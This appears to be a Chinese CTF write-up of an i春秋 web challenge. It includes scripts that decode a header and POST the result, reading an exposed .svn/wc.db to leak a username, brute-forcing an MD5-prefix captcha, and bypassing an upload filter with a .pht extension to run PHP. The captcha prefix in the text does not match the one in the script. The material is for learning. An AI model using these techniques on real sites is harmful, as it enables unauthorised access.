题目见i春秋ctf训练营
看到fast,就想抓个包看看,以前有道题是打开链接直接来了个跳转,当然这题不是
查看返回包,发现一个好东西
拿去base64解码看看
感觉给出的字符串能继续解码,果然解码后得到一串数字
根据提示要把这串数字以post方式提交,变量名为ichunqiu
看到返回的是fast!!!,看来我的手速是满足不了ichunqiu了,那就上py跑
这里有个贼坑爹的事,一开始用py3写的代码死活跑不出来,看了wp,同样原理的py2.7的代码却运行自如
我先贴一下我的py3:
import requests import base64 url = 'http://d5c758086e34407e824f1c45c9dd21a2f65b78a8bc5b4c87.game.ichunqiu.com/' r = requests.get(url).headers['flag'] key = base64.b64decode(r).decode().split(':')[1] key2 = base64.b64decode(key).decode() print(key2) flag = {'ichunqiu':key2} print(requests.post(url, data=flag).text)
要是有大佬知道原因请吱个声
py2.7的代码:
import base64,requests def main(): a = requests.session() b = a.get("http://d5c758086e34407e824f1c45c9dd21a2f65b78a8bc5b4c87.game.ichunqiu.com/") key1 = b.headers["flag"] c = base64.b64decode(key1) d = str(c).split(':') key = base64.b64decode(d[1]) body = {"ichunqiu":key} f = a.post("http://d5c758086e34407e824f1c45c9dd21a2f65b78a8bc5b4c87.game.ichunqiu.com/",data=body) print f.text if __name__ == '__main__': main()
结果是直接返回了一个路径
输入路径后并没有发现有什么线索
里面有个登陆页面,试了好多注入语句都没发现有什么问题
查看wp后才知道是一个SVN 源码泄露漏洞
听大佬的话去访问URL+/刚才的路径/.svn/wc.db,看到了username
同时看到下面的验证码,提示md5加密后前六位为812367,直接用大佬给的验证码脚本跑了(话说大佬怎么知道是8位验证码而且还是不带字母的)
#coding:utf-8 import hashlib def md5(s): return hashlib.md5(str(s).encode('utf-8')).hexdigest() def main(s): for i in range(1,99999999): if md5(i)[0:6] == str(s): print(i) exit(0) if __name__ == '__main__': main("d72824")
将md5后的username与跑出的验证码填入,密码这里似乎随便填一个就行了,我随手一个123就进去了,又得到一个地址
进去一看是个上传,不管三七二十一先抓个包,然后00截断一下试试:
结果返回JPG!!! ,并没有卵用,接着试3.php.jpg,图片成功上传,还被重命名了,并没有解析成php
接着我直接传入php文件并修改后缀名
返回了You got it!:),但并没有实质内容,没办法,去看了wp后才知道后缀可以改成pht
修改完成后成功返回flag
